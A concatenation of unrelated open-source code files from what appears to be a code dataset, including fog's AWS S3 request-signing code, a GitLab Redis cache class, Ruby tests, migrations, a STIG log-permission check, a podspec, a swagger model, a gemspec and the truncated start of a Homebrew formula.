"Grantee" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
},
{
"Permission" => "READ",
"Grantee" => {"URI" => "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"}
}
],
"Owner" => {"DisplayName" => "me", "ID" => "2744ccd10c7533bd736ad890f9dd5cab2adb27b07d500b9493f29cdc420cb2e0"}
}
end
end
def self.data
@data ||= Hash.new do |hash, region|
hash[region] = Hash.new do |region_hash, key|
region_hash[key] = {
:acls => {
:bucket => {},
:object => {}
},
:buckets => {},
:cors => {
:bucket => {}
},
:bucket_notifications => {},
:bucket_tagging => {},
:multipart_uploads => {}
}
end
end
end
def self.reset
@data = nil
end
def initialize(options={})
@use_iam_profile = options[:use_iam_profile]
@region = options[:region] || DEFAULT_REGION
if @endpoint = options[:endpoint]
endpoint = URI.parse(@endpoint)
@host = endpoint.host
@scheme = endpoint.scheme
@port = endpoint.port
else
@host = options[:host] || region_to_host(@region)
@scheme = options[:scheme] || DEFAULT_SCHEME
@port = options[:port] || DEFAULT_SCHEME_PORT[@scheme]
end
@path_style = options[:path_style] || false
@signature_version = options.fetch(:aws_signature_version, 4)
validate_signature_version!
setup_credentials(options)
end
def data
self.class.data[@region][@aws_access_key_id]
end
def reset_data
self.class.data[@region].delete(@aws_access_key_id)
end
def setup_credentials(options)
@aws_access_key_id = options[:aws_access_key_id]
@aws_secret_access_key = options[:aws_secret_access_key]
@aws_session_token = options[:aws_session_token]
@aws_credentials_expire_at = options[:aws_credentials_expire_at]
@signer = Fog::AWS::SignatureV4.new( @aws_access_key_id, @aws_secret_access_key, @region, 's3')
end
def signature_v2(params, expires)
'foo'
end
end
class Real
include Utils
include Fog::AWS::CredentialFetcher::ConnectionMethods
# Initialize connection to S3
#
# ==== Notes
# options parameter must include values for :aws_access_key_id and
# :aws_secret_access_key in order to create a connection
#
# ==== Examples
# s3 = Fog::Storage.new(
# :provider => "AWS",
# :aws_access_key_id => your_aws_access_key_id,
# :aws_secret_access_key => your_aws_secret_access_key
# )
#
# ==== Parameters
# * options<~Hash> - config arguments for connection. Defaults to {}.
#
# ==== Returns
# * S3 object with connection to aws.
def initialize(options={})
@use_iam_profile = options[:use_iam_profile]
@instrumentor = options[:instrumentor]
@instrumentor_name = options[:instrumentor_name] || 'fog.aws.storage'
@connection_options = options[:connection_options] || {}
@persistent = options.fetch(:persistent, false)
@signature_version = options.fetch(:aws_signature_version, 4)
validate_signature_version!
@path_style = options[:path_style] || false
@region = options[:region] || DEFAULT_REGION
if @endpoint = options[:endpoint]
endpoint = URI.parse(@endpoint)
@host = endpoint.host
@scheme = endpoint.scheme
@port = endpoint.port
else
@host = options[:host] || region_to_host(@region)
@scheme = options[:scheme] || DEFAULT_SCHEME
@port = options[:port] || DEFAULT_SCHEME_PORT[@scheme]
end
setup_credentials(options)
end
def reload
@connection.reset if @connection
end
private
def setup_credentials(options)
@aws_access_key_id = options[:aws_access_key_id]
@aws_secret_access_key = options[:aws_secret_access_key]
@aws_session_token = options[:aws_session_token]
@aws_credentials_expire_at = options[:aws_credentials_expire_at]
if @signature_version == 4
@signer = Fog::AWS::SignatureV4.new( @aws_access_key_id, @aws_secret_access_key, @region, 's3')
elsif @signature_version == 2
@hmac = Fog::HMAC.new('sha1', @aws_secret_access_key)
end
end
def connection(scheme, host, port)
uri = "#{scheme}://#{host}:#{port}"
if @persistent
unless uri == @connection_uri
@connection_uri = uri
reload
@connection = nil
end
else
@connection = nil
end
@connection ||= Fog::XML::Connection.new(uri, @persistent, @connection_options)
end
def request(params, &block)
refresh_credentials_if_expired
date = Fog::Time.now
params = params.dup
stringify_query_keys(params)
params[:headers] = (params[:headers] || {}).dup
params[:headers]['x-amz-security-token'] = @aws_session_token if @aws_session_token
if @signature_version == 2
expires = date.to_date_header
params[:headers]['Date'] = expires
params[:headers]['Authorization'] = "AWS #{@aws_access_key_id}:#{signature_v2(params, expires)}"
end
params = request_params(params)
scheme = params.delete(:scheme)
host = params.delete(:host)
port = params.delete(:port) || DEFAULT_SCHEME_PORT[scheme]
params[:headers]['Host'] = host
if @signature_version == 4
params[:headers]['x-amz-date'] = date.to_iso8601_basic
if params[:body].respond_to?(:read)
# See http://docs.aws.amazon.com/AmazonS3/latest/API/sigv4-streaming.html
# We ignore the bit about setting the content-encoding to aws-chunked because
# this can cause s3 to serve files with a blank content encoding which causes problems with some CDNs
# AWS have confirmed that s3 can infer that the content-encoding is aws-chunked from the x-amz-content-sha256 header
#
params[:headers]['x-amz-content-sha256'] = 'STREAMING-AWS4-HMAC-SHA256-PAYLOAD'
params[:headers]['x-amz-decoded-content-length'] = params[:headers].delete 'Content-Length'
else
params[:headers]['x-amz-content-sha256'] ||= Digest::SHA256.hexdigest(params[:body] || '')
end
signature_components = @signer.signature_components(params, date, params[:headers]['x-amz-content-sha256'])
params[:headers]['Authorization'] = @signer.components_to_header(signature_components)
if params[:body].respond_to?(:read)
body = params.delete :body
params[:request_block] = S3Streamer.new(body, signature_components['X-Amz-Signature'], @signer, date)
end
end
# FIXME: ToHashParser should make this not needed
original_params = params.dup
if @instrumentor
@instrumentor.instrument("#{@instrumentor_name}.request", params) do
_request(scheme, host, port, params, original_params, &block)
end
else
_request(scheme, host, port, params, original_params, &block)
end
end
def _request(scheme, host, port, params, original_params, &block)
connection(scheme, host, port).request(params, &block)
rescue Excon::Errors::MovedPermanently, Excon::Errors::TemporaryRedirect => error
headers = (error.response.is_a?(Hash) ? error.response[:headers] : error.response.headers)
new_params = {}
if headers.has_key?('Location')
new_params[:host] = URI.parse(headers['Location']).host
else
body = error.response.is_a?(Hash) ? error.response[:body] : error.response.body
# some errors provide info indirectly
new_params[:bucket_name] = %r{<Bucket>([^<]*)</Bucket>}.match(body).captures.first
new_params[:host] = %r{<Endpoint>([^<]*)</Endpoint>}.match(body).captures.first
# some errors provide it directly
@new_region = %r{<Region>([^<]*)</Region>}.match(body) ? Regexp.last_match.captures.first : nil
end
Fog::Logger.warning("fog: followed redirect to #{host}, connecting to the matching region will be more performant")
original_region, original_signer = @region, @signer
@region = @new_region || case new_params[:host]
when /s3.amazonaws.com/, /s3-external-1.amazonaws.com/
DEFAULT_REGION
else
%r{s3[\.\-]([^\.]*).amazonaws.com}.match(new_params[:host]).captures.first
end
if @signature_version == 4
@signer = Fog::AWS::SignatureV4.new(@aws_access_key_id, @aws_secret_access_key, @region, 's3')
original_params[:headers].delete('Authorization')
end
response = request(original_params.merge(new_params), &block)
@region, @signer = original_region, original_signer
response
end
# See http://docs.aws.amazon.com/AmazonS3/latest/API/sigv4-streaming.html
class S3Streamer
attr_accessor :body, :signature, :signer, :finished, :date, :initial_signature
def initialize(body, signature, signer, date)
self.body = body
self.date = date
self.signature = signature
self.initial_signature = signature
self.signer = signer
if body.respond_to?(:binmode)
body.binmode
end
if body.respond_to?(:pos=)
body.pos = 0
end
end
          # Called if excon wants to retry the request. As well as rewinding the body,
          # we must also reset the signature.
def rewind
self.signature = initial_signature
body.rewind
end
def call
if finished
''
else
next_chunk
end
end
def next_chunk
data = body.read(0x10000)
if data.nil?
self.finished = true
data = ''
end
self.signature = sign_chunk(data, signature)
"#{data.length.to_s(16)};chunk-signature=#{signature}\r\n#{data}\r\n"
end
def sign_chunk(data, previous_signature)
string_to_sign = <<-DATA
AWS4-HMAC-SHA256-PAYLOAD
#{date.to_iso8601_basic}
#{signer.credential_scope(date)}
#{previous_signature}
#{Digest::SHA256.hexdigest('')}
#{Digest::SHA256.hexdigest(data)}
DATA
hmac = signer.derived_hmac(date)
hmac.sign(string_to_sign.strip).unpack('H*').first
end
end
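        # For illustration (sizes taken from #next_chunk above): each call to
        # S3Streamer#call yields one frame in the AWS streaming SigV4
        # ("aws-chunked") format,
        #
        #   "10000;chunk-signature=<64 hex chars>\r\n<65536 bytes of body>\r\n"
        #
        # and, once the body is exhausted, a final empty chunk
        # "0;chunk-signature=<sig>\r\n\r\n". Each chunk signature is chained from
        # the previous one, starting from the request's seed signature.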
def signature_v2(params, expires)
headers = params[:headers] || {}
string_to_sign =
<<-DATA
#{params[:method].to_s.upcase}
#{headers['Content-MD5']}
#{headers['Content-Type']}
#{expires}
DATA
amz_headers, canonical_amz_headers = {}, ''
for key, value in headers
if key[0..5] == 'x-amz-'
amz_headers[key] = value
end
end
amz_headers = amz_headers.sort {|x, y| x[0] <=> y[0]}
for key, value in amz_headers
canonical_amz_headers << "#{key}:#{value}\n"
end
string_to_sign << canonical_amz_headers
query_string = ''
if params[:query]
query_args = []
for key in params[:query].keys.sort
if VALID_QUERY_KEYS.include?(key)
value = params[:query][key]
if value
query_args << "#{key}=#{value}"
else
query_args << key
end
end
end
if query_args.any?
query_string = '?' + query_args.join('&')
end
end
canonical_path = (params[:path] || object_to_path(params[:object_name])).to_s
canonical_path = '/' + canonical_path if canonical_path[0..0] != '/'
if params[:bucket_name]
canonical_resource = "/#{params[:bucket_name]}#{canonical_path}"
else
canonical_resource = canonical_path
end
canonical_resource << query_string
string_to_sign << canonical_resource
signed_string = @hmac.sign(string_to_sign)
Base64.encode64(signed_string).chomp!
end
def stringify_query_keys(params)
params[:query] = Hash[params[:query].map { |k,v| [k.to_s, v] }] if params[:query]
end
end
end
end
end
| 34.613423 | 303 | 0.556327 |
abe3b57a5fc729a59f1cdc14f07413f34b296c1f | 82 | exclude :test_update, 'Precision is off'
exclude :test_values, 'Precision is off'
| 27.333333 | 40 | 0.780488 |
87a14e8367908e58723ea90b12396bcc89d08550 | 1,922 | require "minitest/spec"
require "minitest/autorun"
require 'mocha/minitest'
require "./src/user_config/provider"
describe "UserConfig" do
describe "Provider" do
let(:user_config) {{"credentials"=>{}}}
let(:provider) { UserConfig::Provider.new(user_config) }
it "should create provider" do
provider.wont_be_nil
end
describe "newrelic" do
let(:new_relic_license_key) {"abcdef"}
let(:new_relic_collector_url) {"http://collector.newrelic.com"}
let(:user_config) {{ "credentials"=>{"newrelic"=>{"licenseKey"=>new_relic_license_key, "urls"=>{"collector"=>new_relic_collector_url} }} }}
it "should return newrelic credential license key" do
credential = provider.get_credential("newrelic")
credential.wont_be_nil()
credential.get_license_key().must_equal(new_relic_license_key)
end
it "should return newrelic credential collector url" do
credential = provider.get_credential("newrelic")
credential.wont_be_nil()
credential.get_collector_url().must_equal(new_relic_collector_url)
end
end
describe "aws" do
let(:aws_access_key) {"fddsffdfg"}
let(:user_config) {{ "credentials"=>{"aws"=>{"apiKey"=>aws_access_key }} }}
it "should return aws credential api key" do
credential = provider.get_aws_credential()
credential.wont_be_nil()
credential.get_access_key().must_equal(aws_access_key)
end
end
describe "git" do
let(:my_personal_access_token) { "my access token"}
let(:user_config) {{ "credentials"=>{"git"=>{"myusername"=>my_personal_access_token}} }}
it "should return git credential" do
credential = provider.get_git_credentials()
credential.wont_be_nil()
credential.get_personal_access_token("myusername").must_equal(my_personal_access_token)
end
end
end
end
| 33.137931 | 145 | 0.67794 |
f73ac628bce539eef2518ef953ee41973651ca17 | 1,814 | # frozen_string_literal: true
# Interface to the Redis-backed cache store for keys that use a Redis set
module Gitlab
class RepositorySetCache < Gitlab::SetCache
attr_reader :repository, :namespace, :expires_in
def initialize(repository, extra_namespace: nil, expires_in: 2.weeks)
@repository = repository
@namespace = "#{repository.full_path}"
@namespace += ":#{repository.project.id}" if repository.project
@namespace = "#{@namespace}:#{extra_namespace}" if extra_namespace
@expires_in = expires_in
end
def cache_key(type)
"#{type}:#{namespace}:set"
end
def write(key, value)
full_key = cache_key(key)
with do |redis|
redis.multi do
redis.unlink(full_key)
# Splitting into groups of 1000 prevents us from creating a too-long
# Redis command
value.each_slice(1000) { |subset| redis.sadd(full_key, subset) }
redis.expire(full_key, expires_in)
end
end
value
end
def fetch(key, &block)
full_key = cache_key(key)
smembers, exists = with do |redis|
redis.multi do
redis.smembers(full_key)
redis.exists(full_key)
end
end
return smembers if exists
write(key, yield)
end
# Searches the cache set using SSCAN with the MATCH option. The MATCH
# parameter is the pattern argument.
# See https://redis.io/commands/scan#the-match-option for more information.
# Returns an Enumerator that enumerates all SSCAN hits.
def search(key, pattern, &block)
full_key = cache_key(key)
with do |redis|
exists = redis.exists(full_key)
write(key, yield) unless exists
redis.sscan_each(full_key, match: pattern)
end
end
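    # Illustrative usage (repository and method names assumed, not from this file):
    #
    #   cache = Gitlab::RepositorySetCache.new(repository, extra_namespace: 'branches')
    #   cache.search(:branch_names, 'feature-*') { repository.branch_names }
    #   # => Enumerator over the cached branch names matching "feature-*"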
end
end
| 26.289855 | 79 | 0.642227 |
269dc2195300fd73fe6dd735745158a058dcb13e | 3,797 | require 'test_helper'
require 'benchmark'
class FullPageRefreshTest < ActionDispatch::IntegrationTest
include Capybara::DSL
setup do
visit "/pages/1"
end
test "will strip noscript tags" do
click_link "Perform a full navigation to learn more"
refute page.has_selector?("noscript") # this test should pass, I think
refute page.has_content?("Please enable JavaScript")
end
test "will replace the title and body" do
page.execute_script "document.title = 'Something';"
page.execute_script "$('body').addClass('hot-new-bod');"
click_link "Perform a full navigation to learn more"
page.assert_no_selector('body.hot-new-bod')
assert_not_equal "Something", page.title
end
test "will execute scripts that do not have data-turbolinks-eval='false'" do
click_link "Perform a full navigation to learn more"
assert page.has_selector?("div.eval-true")
end
test "will not execute scripts that have data-turbolinks-eval='false'" do
click_link "Perform a full navigation to learn more"
refute page.has_selector?("div.eval-false")
end
test "will not keep any data-tg-refresh-never nodes around" do
assert page.has_selector?("[data-tg-refresh-never]")
click_link "next"
refute page.has_selector?("[data-tg-refresh-never]")
end
test "going to a URL that will error 500, and hitting the browser back button, we see the correct page (and not the 500)" do
click_link "I will throw an error 500"
has_text = false
while !has_text
has_text = page.assert_text('Error 500!')
sleep 1
end
assert_not_equal "Sample Turbograft Application", page.title
page.execute_script 'window.history.back()'
page.assert_no_text('Error 500!')
assert_equal "Sample Turbograft Application", page.title
end
test "going to a URL that will error 404, and hitting the browser back button, we see the correct page (and not the 404)" do
click_link "I will throw an error 404"
has_text = false
while !has_text
has_text = page.assert_text('Error 404!')
sleep 1
end
assert_not_equal "Sample Turbograft Application", page.title
page.execute_script 'window.history.back()'
page.assert_no_text('Error 404!')
assert_equal "Sample Turbograft Application", page.title
end
test "data-tg-static preserves client-side state of innards on full refresh, but will replaces contents if we specifically data-tg-partially-refresh a section inside of it" do
page.fill_in 'badgeinput', :with => 'data-tg-static innards'
click_link "Perform a full page refresh"
assert_equal "data-tg-static innards", find_field("badgeinput").value
click_link "Perform a partial page refresh and refresh the navigation section"
while !page.has_content?
sleep 500
end
assert_equal "", find_field("badgeinput").value
end
test "data-tg-refresh-always will always refresh the annotated nodes, regardless of refresh type" do
page.fill_in 'badgeinput2', :with => 'some innards 523'
click_link "Perform a full page refresh"
page.assert_no_text "some innards 523"
assert_equal "", find_field("badgeinput2").value
page.fill_in 'badgeinput2', :with => 'some innards 555'
click_link "Perform a partial page refresh and refresh the navigation section"
page.assert_no_text "some innards 555"
assert_equal "", find_field("badgeinput2").value
end
test "data-tg-refresh-always will not destroy or remove the node on a full page refresh" do
assert page.has_content?('data-tg-refresh-always outside of data-tg-static')
assert page.has_content?("You're on page 1")
click_link 'next'
assert page.has_content?("You're on page 2")
assert page.has_content?('data-tg-refresh-always outside of data-tg-static')
end
end
| 39.14433 | 177 | 0.724256 |
ff67704b4fd39fe1fd88a6e6aa218a0aed362a31 | 716 | class CreateAccounts < ActiveRecord::Migration[4.2]
def change
create_table :accounts do |t|
t.string :encrypted_bic, null: false
t.string :encrypted_owner, null: true
t.string :encrypted_iban, null: false
t.string :encrypted_bank, null: false
t.string :encrypted_name, null: true
t.string :encrypted_bic_salt
t.string :encrypted_owner_salt
t.string :encrypted_iban_salt
t.string :encrypted_bank_salt
t.string :encrypted_name_salt
t.string :encrypted_bic_iv
t.string :encrypted_owner_iv
t.string :encrypted_iban_iv
t.string :encrypted_bank_iv
t.string :encrypted_name_iv
t.timestamps null: false
end
end
end
| 31.130435 | 51 | 0.699721 |
616d62fb0b85259c5f64fa54ccaced4d827f39ad | 247 | class CreateClickLogs < ActiveRecord::Migration
def change
create_table :click_logs do |t|
t.references :user, index: true
t.integer :ref_id
t.string :ref_clazz
t.string :ref_url
t.timestamps
end
end
end
| 19 | 47 | 0.659919 |
f7ee49c7e01f3b326ba577f1fee33a24aa489372 | 1,446 | control "VCST-67-000007" do
title "Security Token Service log files must only be modifiable by privileged
users."
desc "Log data is essential in the investigation of events. The accuracy of
the information is always pertinent. One of the first steps an attacker will
undertake is the modification or deletion of log records to cover his tracks
and prolong discovery. The web server must protect the log data from
unauthorized modification. Security Token Service restricts all modification of
log files by default but this configuration must be verified."
impact 0.5
tag severity: "CAT II"
tag gtitle: "SRG-APP-000119-WSR-000069"
tag gid: nil
tag rid: "VCST-67-000007"
tag stig_id: "VCST-67-000007"
tag cci: "CCI-000163"
tag nist: ["AU-9", "Rev_4"]
desc 'check', "At the command prompt, execute the following command:
# find /storage/log/vmware/sso/ -xdev -type f -a '(' -perm -o+w -o -not -user
root -o -not -group root ')' -exec ls -ld {} \\;
If any files are returned, this is a finding."
desc 'fix', "At the command prompt, execute the following commands:
# chmod o-w <file>
# chown root:root <file>
Note: Subsitute <file> with the listed file."
command('find /storage/log/vmware/sso/ -type f -xdev').stdout.split.each do | fname |
describe file(fname) do
it { should_not be_more_permissive_than('0644') }
its('owner') {should eq 'root'}
its('group') {should eq 'root'}
end
end
end | 37.076923 | 87 | 0.713001 |
d5618ca4d9650d92a09bd8810c30ffc8b88a712c | 231 | RSpec::Matchers.define :have_filters do |kind, *names|
match do |controller|
filters = controller._process_action_callbacks.select{ |f| f.kind == kind }.map(&:filter)
names.all?{ |name| filters.include?(name) }
end
end
| 33 | 93 | 0.701299 |
1a28e5a09bc9436b21ceb0b41dd6e3618c98358e | 1,949 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20150504124753) do
create_table "bikes", force: true do |t|
t.string "nickname"
t.text "memo"
t.datetime "created_at"
t.datetime "updated_at"
t.string "typename"
end
create_table "itemhistories", force: true do |t|
t.integer "item_id"
t.datetime "start_date"
t.datetime "end_date"
t.decimal "distance", precision: 8, scale: 3
t.text "memo"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "itemhistories", ["item_id"], name: "index_itemhistories_on_item_id"
create_table "items", force: true do |t|
t.integer "itemtype_id"
t.string "nickname"
t.decimal "distance", precision: 8, scale: 3
t.text "memo"
t.datetime "created_at"
t.datetime "updated_at"
end
add_index "items", ["itemtype_id"], name: "index_items_on_itemtype_id"
create_table "itemtypes", force: true do |t|
t.string "name"
t.decimal "limitdistance", precision: 8, scale: 3
t.text "memo"
t.datetime "created_at"
t.datetime "updated_at"
t.integer "bike_id"
end
add_index "itemtypes", ["bike_id"], name: "index_itemtypes_on_bike_id"
end
| 33.033898 | 86 | 0.707029 |
1a86f4d1c3116d72fd06aaea7c48f0a274b0be62 | 801 |
Pod::Spec.new do |spec|
spec.name = "RZEventKit"
spec.version = "3.0.2"
spec.summary = "Small example to test code sharing."
spec.description = "Small example to test code sharing via cocoapods."
spec.homepage = "https://github.com/nersonSwift/RelizKit"
spec.license = "MIT"
spec.author = {
"Angel-senpai" => "[email protected]",
"nersonSwift" => "[email protected]"
}
spec.source = {
:git => "https://github.com/nersonSwift/RelizSDK.git",
:tag => spec.name.to_s + "_v" + spec.version.to_s
}
spec.source_files = "Sources/RZEventKit/**/*"
spec.exclude_files = "Sources/RZEventKit/**/*.plist"
spec.swift_version = '5.3'
spec.ios.deployment_target = '13.0'
spec.requires_arc = true
end
| 22.25 | 74 | 0.627965 |
01a4d3a07bc145eaffc83fdbc7edd3f130497c6e | 7,774 | =begin
#NSX-T Data Center Policy API
#VMware NSX-T Data Center Policy REST API
OpenAPI spec version: 3.1.0.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.19
=end
require 'date'
module NSXTPolicy
# Paginated collection of members belonging to a Group.
class PolicyGroupMembersListResult
# Link to this resource
attr_accessor :_self
# The server will populate this field when returing the resource. Ignored on PUT and POST.
attr_accessor :_links
# Schema for this resource
attr_accessor :_schema
# Opaque cursor to be used for getting next page of records (supplied by current result page)
attr_accessor :cursor
# If true, results are sorted in ascending order
attr_accessor :sort_ascending
# Field by which records are sorted
attr_accessor :sort_by
# Count of results found (across all pages), set only on first page
attr_accessor :result_count
# Paged Collection of members that belong to the given Group
attr_accessor :results
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'_self' => :'_self',
:'_links' => :'_links',
:'_schema' => :'_schema',
:'cursor' => :'cursor',
:'sort_ascending' => :'sort_ascending',
:'sort_by' => :'sort_by',
:'result_count' => :'result_count',
:'results' => :'results'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'_self' => :'SelfResourceLink',
:'_links' => :'Array<ResourceLink>',
:'_schema' => :'String',
:'cursor' => :'String',
:'sort_ascending' => :'BOOLEAN',
:'sort_by' => :'String',
:'result_count' => :'Integer',
:'results' => :'Array<PolicyGroupMemberDetails>'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'_self')
self._self = attributes[:'_self']
end
if attributes.has_key?(:'_links')
if (value = attributes[:'_links']).is_a?(Array)
self._links = value
end
end
if attributes.has_key?(:'_schema')
self._schema = attributes[:'_schema']
end
if attributes.has_key?(:'cursor')
self.cursor = attributes[:'cursor']
end
if attributes.has_key?(:'sort_ascending')
self.sort_ascending = attributes[:'sort_ascending']
end
if attributes.has_key?(:'sort_by')
self.sort_by = attributes[:'sort_by']
end
if attributes.has_key?(:'result_count')
self.result_count = attributes[:'result_count']
end
if attributes.has_key?(:'results')
if (value = attributes[:'results']).is_a?(Array)
self.results = value
end
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @results.nil?
invalid_properties.push('invalid value for "results", results cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @results.nil?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
_self == o._self &&
_links == o._links &&
_schema == o._schema &&
cursor == o.cursor &&
sort_ascending == o.sort_ascending &&
sort_by == o.sort_by &&
result_count == o.result_count &&
results == o.results
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[_self, _links, _schema, cursor, sort_ascending, sort_by, result_count, results].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = NSXTPolicy.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 29.225564 | 107 | 0.611011 |
28c3c2441ebb24e7385cb922d7dc0b363ee891b5 | 962 | class Templates < Attachments
@@template_types = ["section", "single", "archive", "search", "error", "tag", "layout"]
@@template_types.sort!
def template_types(extension = ".liquid")
@@template_types.collect { |f| "#{f}"+extension }
end
def [](template_name)
template_name = File.basename(template_name.to_s).sub /#{theme.extension}$/, ''
theme.path + "#{template_name =~ /layout$/ ? 'layouts' : 'templates'}/#{template_name}#{theme.extension}"
end
def collect_templates(template_type, *custom_templates)
custom_templates.push(template_type.to_s+theme.extension).collect! { |t| self[t] }
end
# adds the custom_template to the top of the hierarchy if given
def find_preferred(template_type, custom_template = nil)
collect_templates(template_type, custom_template).detect(&:file?)
end
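  # Hypothetical example (template names assumed): `find_preferred(:single, "product.liquid")`
  # checks the custom "product.liquid" first and falls back to the default "single"
  # template, returning the first path that exists on disk.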
def custom(extension = ".liquid")
@custom ||= (collect { |p| p.basename.to_s } - template_types(extension)).sort
end
end | 37 | 109 | 0.696466 |
1cd12219aeedfb8921126d9c19767df22ac51b44 | 1,121 | require "faraday"
module Applicaster
module Ais
class Request
attr_accessor :config
def self.get(path, params = {})
new.get(path, params)
end
def self.post(path, params = {})
new.post(path, params)
end
def self.put(path, params)
        new.put(path, params)
end
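      # Illustrative usage sketch (path and params here are hypothetical); the
      # configured access_token is merged into the params automatically unless
      # one is supplied:
      #
      #   Applicaster::Ais::Request.get("/api/v1/accounts", user_id: 1)
      #   Applicaster::Ais::Request.post("/api/v1/accounts", name: "example")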
def get(path, params = {})
connection.get path, complete_params(params)
end
def post(path, params = {})
connection.post path, complete_params(params)
end
def put(path, params = {})
connection.put path, complete_params(params)
end
private
def connection
@connection ||= Faraday.new(url: config.host) do |connection|
connection.request :json
connection.adapter Faraday.default_adapter
end
end
def complete_params(params = {})
return params if params.has_key?(:access_token)
params.merge(access_token: access_token)
end
def access_token
config.access_token
end
def config
Ais.config
end
end
end
end
| 20.381818 | 69 | 0.589652 |
1d664e690811582a86e9215d5bf9c056916e7f6a | 1,893 | # -*- encoding: utf-8 -*-
# frozen_string_literal: true
$LOAD_PATH.push File.expand_path('../lib', __FILE__)
require 'devise-security/version'
Gem::Specification.new do |s|
s.name = 'devise-security'
s.version = DeviseSecurity::VERSION.dup
s.platform = Gem::Platform::RUBY
s.licenses = ['MIT']
s.summary = 'Security extension for devise'
s.email = '[email protected]'
s.homepage = 'https://github.com/devise-security/devise-security'
s.description = 'An enterprise security extension for devise.'
s.authors = [
'Marco Scholl',
'Alexander Dreher',
'Nate Bird',
'Dillon Welch',
'Kevin Olbrich'
]
s.post_install_message = 'WARNING: devise-security will drop support for Rails 4.2 in version 0.16.0'
s.files = Dir['README.md', 'LICENSE.txt', 'lib/**/*', 'app/**/*', 'config/**/*']
s.test_files = Dir['test/**/*']
s.require_paths = ['lib']
s.required_ruby_version = '>= 2.3.0'
s.add_runtime_dependency 'devise', '>= 4.3.0', '< 5.0'
s.add_development_dependency 'appraisal'
s.add_development_dependency 'bundler'
s.add_development_dependency 'database_cleaner'
s.add_development_dependency 'database_cleaner-mongoid'
s.add_development_dependency 'easy_captcha'
s.add_development_dependency 'm'
s.add_development_dependency 'minitest'
s.add_development_dependency 'omniauth', '< 2.0.0'
s.add_development_dependency 'pry-byebug'
s.add_development_dependency 'pry-rescue'
s.add_development_dependency 'rails_email_validator'
s.add_development_dependency 'rubocop', '~> 0.80.0' # NOTE: also update .codeclimate.yml and make sure it uses the same version
s.add_development_dependency 'rubocop-rails'
s.add_development_dependency 'simplecov-lcov'
s.add_development_dependency 'solargraph'
s.add_development_dependency 'sqlite3'
s.add_development_dependency 'wwtd'
end
| 37.86 | 129 | 0.71421 |
bfc9f646ff460b95689d127254b385a4b8c7778a | 139 | module AppleNewsClient
module Behavior
class Parallax < Base
type "parallax"
optional_property :factor
end
end
end
| 15.444444 | 31 | 0.690647 |
91ef4e72eb74bd00d1105242503441e26c21cc8d | 1,100 | class Fio < Formula
desc "I/O benchmark and stress test"
homepage "https://github.com/axboe/fio"
url "https://github.com/axboe/fio/archive/fio-3.8.tar.gz"
sha256 "3eccc9eb2ccf9d910ab391c5d639565e0f6bb4050620d161f26c36c6ff83454f"
bottle do
cellar :any_skip_relocation
